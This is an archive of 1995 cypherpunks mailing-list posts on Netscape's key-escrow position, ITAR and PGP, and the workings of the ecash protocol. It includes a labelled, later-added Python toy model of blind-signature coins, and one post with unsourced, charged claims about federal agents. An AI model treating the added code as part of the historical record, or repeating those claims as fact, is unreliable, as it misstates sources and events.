On Sat, 2 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:

> > AT&T seems to have been suitably 'incentivized'
> > The receipt of government funding (in whatever guise) might be just as
> > powerful in this case.
> > 
> > To the outsider, it looks as if Netscape 'owes' the government.
> 
>   We do owe the government.  They have paid us for Servers and Clients
> that support Fortezza.  That is what we owe them.  The money that the
> NSA gave us for Fortezza is not very significant compared to what we
> are getting from commercial sources.

Obviously it was significant enough to take.  It was also a perfect 
opportunity for Netscape to express concerns about the future of the 
technology, which is in Netscape's interest.  The astute deal maker would 
be happy to work with the NSA on his own terms.  Instead, it 
would appear that Netscape is working FOR NSA on their terms.


> > > We are actively lobbying in washington to get clarification of the
> > > current regulations so that we can provide the US version via an "export
> > > controlled" FTP or HTTP download.
> > 
> > With which firm?  Or have you made it an in-house effort?
> 
>   We have recently hired a government liaison person to manage our policy
> discussions with the government.  He is one of the people that will be
> talking to congressional and white house representatives next week.
> I don't know if we have made use of any outside lobbying firms.

I'd be interested to know what a 'government liaison person' is.  It 
sounds to me like an 'in house lobbyist.'  There is an old joke in the 
beltway about in house lobbyists.

I also would like to know why you are actively lobbying for 
'clarification' rather than 'modification' of the current policy.

Netscape seems to be taking the position, "We'd love it if you'd let us 
do X, but we are happy to roll over for whatever."  and  "By the way, 
what is the rule on exporting software again?"

I am impressed that some effort is being made.  I think it is in the form of 
'too little, too late.'  But hey, who am I?

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 3 Dec 1995 12:41:42 +0800
To: tcmay@got.net (Timothy C. May)
Subject: a foot here, a foot there -- pretty soon your mouth is *really* full (was: Re:Netscape, Corporations, and GAK Support)
Message-ID: <v03003e03ace6ccb69873@[129.46.82.85]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 AM 11/30/95, Timothy C. May wrote:

>It's possible that Jim Clark--whose quotations I have not yet seen denied
>by Netscape--is merely naive on matters of mandated key escrow. It's
>possible that he hasn't given it much thought.

I watched him in acquisition mode once upon a time and I rather doubt this:
I imagine that he's giving this considerable thought (he has the time while
counting stacks of shares on his bed every night ;), watching this space
and letting the "petty officers" navigate through this reef for now. His
statements so far indicate nothing more to me than that he's just playing
his cards very close for now so as not to alienate anyone: this is what a
captain should be expected to do when the waters are potentially this
"dangerous." Why would/should he chop the Feds off at the knees until he
knows exactly which way _their_ smoke blows? They're still trying to figure
out what the hell we're up to, and if we can manage to stay ahead of their
lumbering giants (Freeh, et alia), it'll pretty much stay that way for a
long time.

Anyway, no policy statements coming from Netscape NOW can be a reliable
indicator of where they're going to be -- even in a year -- on crypto
policy or on the internal development. All we're seeing for the foreseeable
future is trial balloons and other strategic positioning. I bet Jim's read
the Book of Five Rings...

> It's also possible that he
>sincerely is supportive of plans for Big Brother to have an "escrowed" copy
>of our conversations, diaries, travel plans, etc.

Jim may "appear" a tad "hawkish," but he's no dope. Look, a 70% share, even
with momentum behind it, can slim down mighty fast with bad choices and
lots of fast dogs at his heels and he knows it. Let me put it this way:
"the higher they sell, the faster they drop."

Tim, you're absolutely right that speaking out NOW (and directly at him) is
the surest way for him and others to have data on which to base their
future decisions. If there are other solutions for modules Netscape intends
to provide (like...NS2.0's Mail module + GAK vs a c-neutral Eudora with an
optional MOSS translation plug-in), then he'll lose market share
proportional to how much we scream about it in public (I'm doing daily
vocal exercises, just in case ;). If he makes enough bad choices, like
throwing his full weight behind GAK and other atrocities, he'll end up like
DigiCash *would* if they kept/keep the bank protocol hidden. I just refuse
to believe he hates his work that much. At the worst, I see a special
"gaak" version for the Feds, but I sure as hell wouldn't buy it (and I
bought my copy of Netscape).

It would be nice to hear from him here directly, though. One can only
tolerate so much pussyfooting around before one becomes snippy.

   dave

________________________________________________________________
"I prefer a _real_ whorehouse to The Theatre." --Dorothy Parker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Sun, 3 Dec 1995 11:28:14 +0800
To: cypherpunks@toad.com
Subject: Use of PGP as an export?
Message-ID: <2.2b7.32.19951203050924.002d163c@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I think this has been brought up before, but I could only find one reference
to it in the archives and it wasn't too helpful, so I'll ask again.  If a
university provided a copy of PGP for use on their unix machines and a
non-resident, non-citizen *used* the copy of PGP on the server, but did not
download it onto their own machine, but instead just ran PGP on the server
alone, would it be a violation of the ITAR?  My school is interested in
putting a copy of PGP on the university server and wants to know if they
should somehow restrict access to citizens and legal residents only.  Thanks.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 13:36:14 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT:  ALICE'S ADDRESS REVEALED.
Message-ID: <199512030524.VAA24279@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


As I promised, I've now opened a channel so that anyone who wants to
can send Alice de 'nonymous email.  I can now be reached via
an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
address will get to me, and I will do my best to reply to you as well,
but I can't guarantee anything.

And before I get attacked for wasting bandwidth, I've got a deal to 
make it all worthwhile. 

A temporary break from GAK talk ... a pointer to a truly HOT website.

Here's just a small sample of what you'll find there:

:|                  ELIMINATING LIMBO
:|
:| "So the pope eliminated Limbo, did you hear?" she says
:| "What?"
:| "You know the pope, right, well he eliminated Limbo..."
:| "When?"
:| "I don't know, a while ago."
:| "Well that means we're fucked..."
:| "You got it."
:| "What's Limbo for?" asks Jessica
:| "That's where all the people that were around before they had the 
:|  chance to get the word of christ get to go...and unbaptized babies 
:|  that die early..."
:|
:| "It's not as good as Heaven, but it beats the hell out of the other
:|  options."
:| "How can he just eliminate it like that?"
:| "Cause he's the pope..."

Check all of this out and MORE at the SCARED SACRED site.  You'll be 
able to read the pope's "LETTER TO ALL THE WOMEN OF THE WORLD".

:| "What he wrote a letter to all the women of the world? Man, his direct
:|  mail expenses must be huge!"
:| "Yeah the people in the Vatican are just freaking out..."

But you have to be running NETSCAPE.
(1.1....NOT 2.0....OR IT JUST WON'T WORK...)


Point your Navigators to       http://www.banffcentre.ab.ca/
     and then choose the     --> Media & Visual Arts Page <--
and then from there the           --> Artists Web, <--
  and then just look for          --> VELCRO RIPPER. <--


BE CAREFUL THOUGH IF YOU ARE PRONE TO EPILEPTIC ATTACKS!!!!
IF YOU ARE, CHOOSE THE DIRECT ENTRANCE AND ENTER THERE!!
               YOU HAVE BEEN WARNED!!!



Alice de 'nonymous ...               <an455120@anon.penet.fi>

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sun, 3 Dec 1995 10:40:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tM49q-00032oC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:09 PM 12/1/95 -0600, Al Thompson wrote:
>At 06:57 PM 11/30/95 -0500, JHupp@Gensys.Com wrote:
>
>>	And at that point, you shut down the remailer and log each and every 
>>bounce.
>>
>>	Now, they could get an order forcing you to run a remailer ~ but that 
>>would open up a whole new can of worms i.e. can you be forced, under 
>>court order, to commit a crime?
>  
>That's not how they do it.  They will tell you that unless you cooperate,
>you will
>be charged for the "crime" you have been committing.  Where do you think
>confidential informants come from?  They're just people who have been caught
>or set up by the cops, who are trying to save their own ass.
> 

There are times when all that can be said is Amen!!! Most of these people have
absolutely no clue to the way the government REALLY works! The feds will set
up a "little" fish in order to catch what they consider to be a "big" one.  Ask 
Randy Weaver! They weren't really after him... they were after the Aryan Nations.
They wanted Mr. Weaver to infiltrate for them... So they attempted to encourage
his enthusiasm... How? They set him up on a bogus gun charge... when that 
wasn't successful... They killed his family!

The problem is people still live under the mistaken notion that there are rules!
When the congress and the courts passed laws allowing the confiscation of 
property without due process and further allowed the proceeds from the sale of 
that property to fund the coffers of the agencies that took those properties, they
assured our descent into a totalitarian state. We are like the walking wounded,
soon to be the walking dead. We are dead and don't know it! Unless the tree of
Liberty is watered soon... it seems we are doomed!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF IRChat)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 3 Dec 1995 10:40:05 +0800
To: cypherpunks@toad.com
Subject: Remind me why we're so mad at Netscape
Message-ID: <199512030233.VAA09146@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please remind me what it is we're mad at Netscape about?
As far as I can tell it's some combination of the following offenses:

(a) - Jim Clark made a speech in which he revealed that he thought the
government would be a player in determining the way cryptography ends
up being deployed on the Internet.  He was quoted in the trade press,
but it was unclear exactly which words were actually his.  Asked to
clarify, he said that Netscape would implement mandatory government
access across its product line only if required to by law, but he
observed that things seem to be moving in that direction.  I share his
pessimism, unfortunately, unless we find a way to shift the winds.

(b) Netscape contracted with the government to produce a ``Fortezza''
version of their browser for government use.  They negotiated to get a
lot of money for this (maybe something like $5 million).  Good for
them.  Personally, I *like* the Fortezza interface; the API seems to
provide a good abstraction for hardware and software crypto, it's easy
to replace the module with something else (like software 3DES with no
key escrow), and it's easy to defeat the key escrow features.  Of
course, maybe I'm just defending them out of guilty self-interest
here, since I've played around with the Fortezza interface quite a bit
myself, although they never sent me my $5 million.

(c) No one from Netscape attended the Bernstein hearing.  I wish someone
had let me know beforehand that that was to be the litmus test for the
right to claim cryptographic correctness, or I would have flown right
out.  I guess I blew it, too.

(d) Their stock price is very high, many times greater than their
profits and physical assets would seem to justify.  I'm not sure I
understand the implication here.  Maybe that this is proof that in
exchange for selling out (by committing sins (a), (b) and (c), above),
the secret NSA stock-price-manipulation cabal rigged the market to
overvalue their stock?  Wow.

Don't get me wrong here; it may be useful to make clear that the market
(to the extent that any of us can claim to represent any market they
would be interested in) won't tolerate vendors who put the government's
desires ahead of their customers' security needs.   But I have yet to
see any actual evidence that that's what's happened here, and I'd hate to
see Netscape lose a lot of good people who could go a long way toward
deploying real security on the net over something that turns out to have
been a false alarm.

Disclaimer: I'm employed full time by a soon-to-be-tri-vested major
player in the military industrial complex, and us sellouts like to
stick together.

-matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 14:37:54 +0800
To: cypherpunks@toad.com
Subject: prototype slot-machine
Message-ID: <199512030623.WAA17815@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've written up a slot-machine thing for ecash, very
experimental, very buggy, not very slick, (i'd like to get the
technical bugs worked out before i put a fancy wrapper on it) and i'd
*like* to announce it here for testing, but I'm worrying about
gambling laws.. 
	any thoughts?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 16:53:02 +0800
To: Hal <cypherpunks@toad.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <ace670ba200210044091@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I say "Hear, Hear!" to Hal Finney's message about why we should be mad at
Netscape and Jim Clark.

(Although I still have a bit of hope that Netscape and Clark will see the
importance of not simply giving up.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 2 Dec 1995 20:44:33 +0800
To: cypherpunks@toad.com
Subject: NSC Announce
Message-ID: <199512021234.XAA25640@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Thought this might be of interest....

From: ipSecure <ipsecure@ipower.nsc.com>
Subject: iPower home page/CryptoSampler announcement
Date: Fri, 01 Dec 95 15:53:55 PDT



For Immediate Release

Contact:  National Semiconductor
          Lori Sinton (408) 721-2448
          lori@ipower.nsc.com
          http://www.ipsecure.com


CryptoSampler, from National Semiconductor, Demonstrates Ease of
     Building Secure Electronic Commerce and Communications
                          Applications

   Company's iPower(tm) Business Unit Launches Free CryptoSolver
                   to Inaugurate New Web Site


SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor
Corporation today announced the availability of its CryptoSampler
package for applications developers interested in gaining a "hands on"
understanding of how cryptography solves modern business problems.
Developed by National's iPower Business Unit, the program consists of
three demonstration applications and the PersonaCard(tm) 100, a
hardware token for personal, portable data security.

     The package contains both the demonstration applications
including "build-it-yourself" tools to integrate security easily
into electronic commerce and communications applications. Priced at
$129, the CryptoSampler package is available to the first 1,000 U. S.
respondents and can be ordered directly from National's iPower
Business Unit.

     In a related move, the company's iPower Business Unit launched
its own web site along with CryptoSolver, an interactive game that
invites participants to solve encrypted messages based on the concepts
of substitution ciphers and the alphabetic frequency table.
CryptoSolver, a technology-teaser game, rates players' deciphering
skills and can be downloaded from iPower's new web site free.

"As networks become the lifeblood of corporations and the principal
means of commerce, securing electronic transactions and proprietary
information over public and private networks is absolutely critical,"
said Tom Rowley, marketing director for National's iPower Business
Unit. "Through this program, we hope to help broaden individuals'
understanding of how modern security technology can solve real
problems on the Internet and in Electronic Commerce business
applications," Rowley explained.

CryptoSampler Package - Token Plus Three Applications in One
------------------------------------------------------------

     The CryptoSampler package consists of a PersonaCard 100 data
security token, a floppy disk containing all three demonstration
applications, a cryptography primer written by recognized cryptography
expert Bruce Schneier, and a questionnaire. Customers who choose to
complete and return the questionnaire, will receive a free copy, while
supplies last, of Bruce Schneier's newly-released book, Applied
Cryptography, second edition.

o PersonaScreen(tm) System Lockout Utility is a screen locker that
  prevents unauthorized entry into a personal computer by locking the
  keyboard and mouse. The PersonaCard Token, implemented in the PC
  Card (formerly PCMCIA) Type II format, locks and unlocks the desktop
  computer.

o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt,
  decrypt), and verify documents as well as e-mail messages from
  within Microsoft Word 6.0 for Windows. Installed automatically,
  PersonaSecure displays a toolbar that corresponds to the functions
  of National's PersonaCard data security token. The hardware token
  incorporates RSA's industry-standard digital signature and
  encryption formats which are now "token aware." In addition to
  protecting and validating Microsoft Word documents, users can
  encrypt and decrypt e-mail messages with others who have installed
  the PersonaSecure Word Utility.

o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library
  (DLL) of routines that enables developers to quickly and easily
  develop their own applications incorporating high-level data
  security features. PersonaDLL includes a Visual BASIC application,
  Visual BASIC source code, and access to all of the features of the
  PersonaCard 100 token including digital signatures, RSA key
  generation, encryption, and verification.

     System requirements to run the CryptoSampler package are:
Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot
(version 2.1 or later). Microsoft Word 6.0 is required for the
PersonaSecure Word Utility.


Pricing and Availability
------------------------
     The CryptoSampler package is available with or without a PC Card
Reader. For those who plan to run CryptoSampler applications on a
desktop or portable personal computer already equipped with a PC Card
slot, the basic package is offered at a special price of $129
(including handling and shipping). A CryptoSampler package with PC
Card reader is available for $199. The total retail value of the basic
package and configuration with card reader is $300 and $500,
respectively.

     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .

iPower Security Solutions
-------------------------
     Introduced a year ago, iPower technology provides the
highest-level of commercially available security in a personal,
portable hardware token. iPower solutions are already being
incorporated by OEMs, ISVs, and VARs into a variety of applications
and hardware platforms including e-mail and messaging, electronic
commerce, network security, and secure access to on-line services
including the Internet.

National Semiconductor Corporation provides technologies for moving
and shaping information. The company focuses on four key areas -
communications, consumer, industrial, and personal systems. National
Semiconductor is headquartered in Santa Clara, California, and has
22,300 employees worldwide.

                              -30-

Note to Editors: To receive a CryptoSampler package for review, call
or e-mail Lori Sinton, 408 721-2448 or sampler@ipower.nsc.com

iPower and PersonaCard are trademarks of National Semiconductor
Corporation. All other trademarks are held by their respective
companies


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 11:57:38 +0800
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Questions/Comments on ecash protocol
In-Reply-To: <199512030127.RAA03496@cory.EECS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.951202223133.3336H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for the sterling analysis.  I for one am following this with 
enormous interest, even though some of the details are lost on me right now.

I can't recall if you were party to the earlier thread on "digital coin 
launderies", and I know some of it was off line.  I hope you will keep 
some of the following in mind as you go.

One of the major questions about digicash/MTB$ is whether and how money
might be laundered.  The question subsumes the following (among others): 

1) What information about Charlie/customer is encoded onto the coin? 
(There must be some, right, since the serial number is blinded?)  Since the
bank doesn't know what serial number it is signing, it needs to put info 
about Charlie onto the coin so that it can track him down if he double 
spends.  Lacking such info, the bank can refuse to honor a double-spent 
coin, but has no way to know who the double-spender is.

2) How does Charlie's (customer) software store the coin internally?

3) Is there a way [how hard is it] for Charlie to extract a coin and 
either 
   (i) copy it and/or 

   (ii) send it to David [3rd party] in such a way 
that David could insert it into David's MTB software and then spend it to 
Sam without Sam or the Bank noticing that anything was wrong.  If Charlie 
and David do this, David now has a coin that is from his point of view 
both payee and payor anonymous, although Charlie has a risk that David 
will double-spend and expose Charlie to the bank's wrath.

4) What information if any is encoded onto a coin when Charlie spends it 
to Sam?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 14:58:45 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512030120.CAA06452@utopia.hacktic.nl>
Message-ID: <199512030641.WAA19211@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> client profile, provided you are using Apache 0.8.x (I know sameer is). See
	Incorrect. We are running Apache 1.0.0

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 3 Dec 1995 15:07:54 +0800
To: cypherpunks@toad.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <9512030656.AA22522@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From Hal Finney:

[in regard to Jim Clark "preaching acquiescence"]: 
Where is the recognition that the right to tap communications is not granted by 
God but an accident of technology, one which can be taken away by technological 
progress as easily as it was granted?
..............................................................

I agree with Hal's comments.  If Netscape acquiesced to the use of GAK, it 
would be very easy for cypherpunks and others to switch browsers; they could 
re-direct interest to Mosaic or even create their own.

Netscape is in a prominent position, however, in the net community, which is 
looking to prevent government control of their electronic communication.  The 
NSA and other government agencies are looking for excuses to give their 
decisions the appearance of legitimacy.  Any perceived weakness on the part of 
the commercial key players in cyberspace can be perceived as conducive towards 
the implementation of mandatory security plans, in disregard of the actual 
desires of internet users.

It appears that Netscape is stuck between a rock and a hard place:  

.  if they adamantly resist GAK, they're in trouble with "the Law"
.  if they appear agreeable to complying with future legal mandates, they're in 
trouble with their customers in cyberspace.

Losing the fight intellectually precedes losing it in fact.  This is more 
likely to result when the distinction between government "authority" vs citizen 
"rights" is obscured from the general consciousness (as in: whose business is 
it, anyway?).

Anyone who provides a communication service which can be made accessible to 
"the Law" becomes by default a representative of the issue, which to me amounts 
to what someone wants to promote in the U.S. (or the world) in terms of ideals; 
in terms of a way of life.

It would promote an atmosphere of intellectual integrity to have explicitly 
definite statements about the objections to GAK, but barring that it is useful 
to know that these representatives appreciate why the difference is important.

.  is it because money is being lost?
.  because privacy is at stake?
.  because the ideal of self-determination is being muddled, along with
.  an understanding of where the concept of "individual unit citizens" stands 
in relation to concepts of "government authority"?
.  because of the consequences of that obfuscation?

The caution with which this GAK business is being dealt with I think is 
symptomatic of an underlying problem, which is of not having a sense of freedom 
to stand up to the Dark Side.

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 15:47:22 +0800
To: nowhere@bsu-cs.bsu.edu (Anonymous)
Subject: Re: your mail
In-Reply-To: <199512030545.AAA01728@bsu-cs.bsu.edu>
Message-ID: <199512030732.XAA23416@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Competing with Netscape is obviously something that's easier said than
> done.  But we ought to consider the strategic importance of having robust,

	I hate to repeat myself, but sometimes people don't listen.
http://www.c2.org/apachessl/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Dec 1995 14:14:12 +0800
To: Michael Froomkin <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Questions/Comments on ecash protocol
Message-ID: <v02120d05ace6ea8784af@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:40 12/2/95, Michael Froomkin wrote:
>thank you for the sterling analysis.  I for one am following this with
>enormous interest, even though some of the details are lost on me right now.

[Well done, Ian!]

[...]

>1) What information about Charlie/customer is encoded onto the coin?

None.

>(There must be some, right, since the serial number is blinded?)  Since the
>bank doesn't know what serial number it is signing, it needs to put info
>about Charlie onto the coin so that it can track him down if he double
>spends.  Lacking such info, the bank can refuse to honor a double-spent
>coin, but has no way to know who the double-spender is.

Since an online clearing protocol is being used, the bank has no need to
identify double spenders. The bank will simply refuse to honor a double
spent coin. In fact, cancelling a payment in this protocol is done by just
depositing the coin yourself.

>3) Is there a way [how hard is it] for Charlie to extract a coin and
>either
>   (i) copy it and/or
>
>   (ii) send it to David [3rd party] in such a way
>that David could insert it into David's MTB software and then spend it to
>Sam without Sam or the Bank noticing that anything was wrong.  If Charlie
>and David do this, David now has a coin that is from his point of view
>both payee and payor anonymous, although Charlie has a risk that David
>will double-spend and expose Charlie to the bank's wrath.

I can't help the feeling that I am missing something whenever you bring up
this question. Assuming it could be done. What would David gain? He as the
payor is anonymous to Sam either way. Sam still would have to be worried
about being identified, since if Charlie gives David access to Charlie's
wallet, it is safe to assume that Charlie will give David (and the mint)
access to his blinding factor. Which in turn would reveal Sam as the payee.

The protocol you suggest gives the parties exactly what they would have if
they just used Ecash "out of the box": full payor anonymity, no payee
anonymity. So why bother?

<insert standard disclaimer here>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
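
Added example, not part of Lucky Green's message and not DigiCash's code: a toy Python model of the online clearing described in the message above, where the mint refuses a serial number it has already cleared instead of carrying payer identity on the coin. The RSA key, the SHA-256 coin encoding and the names Mint, withdraw, link and scenario are assumptions made for this sketch.

```python
"""Toy model of online-cleared, blind-signed coins.
Added illustration; not DigiCash or Mark Twain Bank code."""
import hashlib
import secrets
from math import gcd

# Constructed demo RSA key for the mint: two Mersenne primes, far too
# small for real use.  E is the usual public exponent.
P, Q = 2**31 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # mint's private exponent


def h(serial: bytes) -> int:
    """Map a serial number into Z_N (assumed stand-in for the coin format)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Mint:
    def __init__(self):
        self.withdrawals = []    # (account, blinded value) as seen at signing
        self.deposited_by = {}   # serial -> account that cashed the coin

    def sign_blinded(self, account: str, blinded: int) -> int:
        """Sign a value whose serial number the mint cannot see."""
        self.withdrawals.append((account, blinded))
        return pow(blinded, D, N)

    def deposit(self, account: str, serial: bytes, sig: int) -> str:
        """Online clearing: verify, then refuse any serial seen before."""
        if pow(sig, E, N) != h(serial):
            return "bad signature"
        if serial in self.deposited_by:
            return "refused: already spent"
        self.deposited_by[serial] = account
        return "accepted"

    def link(self, serial: bytes, r: int):
        """With a blinding factor disclosed by the payer, tie a cleared
        coin to its withdrawal and to whoever deposited it."""
        blinded = (h(serial) * pow(r, E, N)) % N
        payers = [a for a, b in self.withdrawals if b == blinded]
        return payers, self.deposited_by.get(serial)


def withdraw(mint: Mint, account: str):
    """Client side: pick a serial, blind it, get it signed, unblind."""
    serial = secrets.token_bytes(16)
    r = 0
    while r < 2 or gcd(r, N) != 1:
        r = secrets.randbelow(N)
    blinded = (h(serial) * pow(r, E, N)) % N
    blind_sig = mint.sign_blinded(account, blinded)
    sig = (blind_sig * pow(r, -1, N)) % N     # (h * r^E)^D / r = h^D
    return serial, sig, r


def scenario():
    """Run the cases from the thread with constructed account names."""
    mint = Mint()
    serial, sig, r = withdraw(mint, "charlie")
    withdraw(mint, "erin")                     # unrelated withdrawal
    results = {}
    results["forged"] = mint.deposit("sam", serial, (sig + 1) % N)
    results["first"] = mint.deposit("sam", serial, sig)
    results["copy"] = mint.deposit("david", serial, sig)
    # What the mint logged at withdrawal is not the value it sees now.
    results["seen_before"] = any(b == h(serial) for _, b in mint.withdrawals)
    results["linked"] = mint.link(serial, r)
    # Cancelling a payment: the payer deposits the coin first.
    s2, g2, _ = withdraw(mint, "charlie")
    results["cancel"] = mint.deposit("charlie", s2, g2)
    results["late"] = mint.deposit("sam", s2, g2)
    return results


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name:12} {value}")
```

The `linked` result corresponds to the point about the blinding factor: once the payer hands r to the mint, Sam's deposit is tied to Charlie's withdrawal.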






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 14:48:21 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <199512030737.BAA02145@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 1 Dec 1995 11:58:26 -0500
> To:            semper.fi@solutions.apple.com
> From:          rah@shipwright.com (Robert Hettinga)
> Subject:       GAK, Netscape, CyberDog, and you.
> Cc:            cypherpunks@toad.com, mcip@deepeddy.com, www-buyinfo@allegra.att.com,
>                ecm@ai.mit.edu, bsdc@ai.mit.edu

> I hear that with CyberDog, building a secure Netscape-compatible browser in
> OpenDoc is now pretty simple. That adding economically useful -- and

Where can one get more information on CyberDog?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:02:53 +0800
To: cypherpunks@toad.com
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <ace5cd0216021004c8fd@[205.199.118.202]>
Message-ID: <30C162DD.1E2F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> I just get sick of those who tout themselves as Experts in Software
> Munitions and in fact are merely in it for the cash.  In it for the
> cash is just fine.  Just don't tell me later you aren't.

  Can't I be a supporter of strong crypto, and also be in it for the money?
Many people here make good money off of crypto related work.  If I'm asked
to implement GAK in a situation where it is not mandated by law, I won't
do it.

> > I read the Jim Clark statement that Jeff forwarded. It seemed noncommittal
> > on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> > opposed to offering GAK for the Iraqis or French). I await with interest
> > the clarification of the anti-GAK stance that Jeff alluded to.
> 
> I believe you got it with:
> 
> "If the law requires GAK, then I believe that we will implement it rather
> than just disable encryption."

  Tim was referring to the position statement against GAK that we will be
releasing before the NIST meeting next week.

> Note that the phrase is entirely ambiguous on whether this refers to the
> law requiring GAK for export, or export AND domestic sales.  Netscape
> will install GAK into whatever will increase its sales.  I understand
> and respect this position in the context of a company which needs
